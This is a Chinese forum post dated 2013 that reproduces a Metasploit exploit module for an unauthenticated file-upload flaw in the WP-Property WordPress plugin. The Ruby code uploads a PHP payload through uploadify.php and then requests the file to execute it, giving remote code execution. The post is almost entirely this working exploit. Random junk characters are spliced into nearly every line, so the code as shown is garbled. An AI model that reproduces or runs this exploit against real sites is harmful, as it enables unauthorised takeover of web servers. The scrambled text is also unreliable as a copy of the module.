WordPress WP-Property PHP 文件上传漏洞
( e3 R& D7 s5 j7 M8 |/ g( ]2 c9 I8 S. r9 u
## # This file is part of the Metasploit Framework and may be subject to
* b/ n" } Y5 R: \
. L+ r/ P/ C0 o& }9 G9 O/ I# redistribution and commercial restrictions. Please see the Metasploit
$ Z0 i$ K8 U& l6 w4 v# ^
y: W! J u- t( v% y. z# Framework web site for more information on licensing and terms of use.2 i x$ W. K! k y+ _0 E
# m/ {/ `2 S) O# Y4 i! a" U; f# http://metasploit.com/framework/ ##7 H4 b# Y( K, P8 {7 S6 ^$ U
% b; G2 @4 _! F2 S! ]) c
% y( M% v+ `6 ~$ N- W6 \
2 u- X( K0 t0 o
9 {; g1 u$ [: x) [5 G
6 C0 K' G0 P9 I$ A& \require 'msf/core'
6 i5 G# K g: F, |require 'msf/core/exploit/php_exe'& n* f5 q. U0 B5 y
8 g# f* W( U* F3 J5 T8 r, t
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',& `' d! g) R/ `5 o- w
'Description' => %q{
4 a% w6 r" J) p% s* K @. R$ CThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>9 T$ R1 y' V' A8 L
[
% H+ ? V6 T. p# ^. F& ?'Sammy FORGIT', # initial discovery
6 [ ^3 s+ [" Z q6 o'James Fitts <fitts.james[at]gmail.com>' # metasploit module, @: S, }' N% ]( I+ D& ?
],4 C# u2 _1 [/ A/ p
'License' => MSF_LICENSE,* `. \% _, I4 c; O! ]
'References' =>
6 t# b$ H5 a5 t! R[2 y7 R: o! z" T0 Q
[ 'OSVDB', '82656' ],. W9 f' q) S; T7 F) Z# `1 y
[ 'BID', '53787' ],: n" W/ F: g! g: S" w2 ?5 j4 |0 u
[ 'EDB', '18987'],. R/ u1 V& k( U& c! a. T
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]9 `. T2 E! e3 D$ z% A* d! F
],( s- D$ D) D! d; s: v. H
'Payload' =>
- z5 e& i8 ]& J4 R: k4 t{
$ @4 L( C# u: I% g% W7 H% b! S'BadChars' => "\x00",
& [2 j' r3 T4 ~% T7 n' L4 ]7 k: k},) o0 O+ f5 o2 Z" O% `8 O
'Platform' => 'php',
7 o o0 R2 u" x9 A4 p# H'Arch' => ARCH_PHP,
7 W4 r$ e2 K# g/ S0 m- a'Targets' =>$ I/ a E' s) p% L( |5 o
[
' X$ E* H$ W2 Q0 i" {6 Z# q[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
5 t4 R1 a5 W$ _/ m/ ?. T[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
: |. v! j4 k0 [- i],! R# z0 j7 f9 |
'DefaultTarget' => 0,5 D( |# z% A) [6 P6 D/ W+ x
'DisclosureDate' => 'Mar 26 2012'))1 {2 s/ O0 j! z% v" ^' _
( ^. f+ ^3 l6 \/ ?1 x% c7 ?, D+ sregister_options(+ t+ n- L1 V% t4 A" h6 }
[& n }5 ?# V5 b
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
3 L( v- J& J1 m% |5 ^4 c], self.class)
4 Q* ~& _* W+ l% p' ?end
. ^6 e7 }1 V2 I9 f# D0 ? a: J: I2 m$ p. a; A S. ^5 _% P
def check$ a3 \! |' F0 P: P
uri = target_uri.path9 j# p% h& F2 x' N% l# U8 q7 D) I
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
% K, S2 U. c. @8 \+ e4 a7 b; ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": k7 ?* Z3 N/ o
}). h- B+ v* K/ A, _% T4 v$ d
# V- r) i; @1 }: |if not res or res.code != 200- z7 C3 p, Z$ X+ @: ~7 _
return Exploit::CheckCode::Unknown6 L" [2 w8 i2 j8 y( L/ a9 u
end
8 ]# R1 {" |$ Y) e; l% {
+ V9 y# x1 @: J& ~% Kreturn Exploit::CheckCode::Appears- c/ H/ N h% k/ `% s5 t
end
" O) @: [0 X8 E# t
" R, ~/ C% a( Y1 T X$ O `$ kdef exploit1 r7 x8 Q6 ^- g* i# {9 V: D
uri = target_uri.path3 m& i8 G, r' z( _# K2 [% j
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
4 J0 }7 S0 s; J' D& [' u0 o1 E- H( E% J" i Q' J: [) g
data = Rex::MIME::Message.new
- O' c9 ] }/ Q: O5 [( o6 Hdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
5 |& Z2 v3 U; d) s7 A: sdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""); D; T. u3 F8 S' M* s7 Z- R2 f
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! X* y1 Z( \) b; [) ]) x' A
8 z% r9 k8 g9 [print_status("#{peer} - Uploading payload #{@payload_name}")
9 V+ X/ {$ E5 X, C$ x) a! @res = send_request_cgi({
! p" F' }8 r3 J3 `. _( V+ G'method' => 'POST',
/ B. X5 J9 i3 X. t'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",; X+ @0 ]) s/ [2 v, P2 |
'ctype' => "multipart/form-data; boundary=#{data.bound}",- E5 ~' Q/ h% t) S4 d* m
'data' => post_data
4 P4 f5 ^" }: L8 u s9 B})2 m4 q- L+ }! b
6 M$ }, O3 Y) ?* B4 q( S
if not res or res.code != 200 or res.body !~ /#{@payload_name}/4 C# q& ~ `# R: D6 _5 s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")/ K& p$ ~4 f# d0 F' N2 a7 ~
end2 k9 g" s; v' N: r2 H
3 |; G: H3 @; h& V* \, i) v* v
upload_uri = res.body
; O/ m+ C* Y" m* z" W. D/ {/ x) h& }: g/ p+ U9 Q! K) `* O
print_status("#{peer} - Executing payload #{@payload_name}")
% J+ f7 \7 E( xres = send_request_raw({
6 v" V. J# {; d4 K4 W# I'uri' => upload_uri,# C8 E! s) _9 z) D0 \
'method' => 'GET'
( S; i& I* b5 V0 Q- |* z})
/ t5 p" v& a9 J7 wend
% T: m0 f! a8 A1 f6 Y- O" E' G/ Aend
9 b6 a4 \: M: c% P+ w5 ~
" `, i4 S, m8 V不要问我这写的是什么 怎么利用 我是说msf.7 N6 N& U) J- q) J2 u
; h5 Y3 G+ E- M
|
发表于 2013-1-4 19:51:30
收藏
支持
反对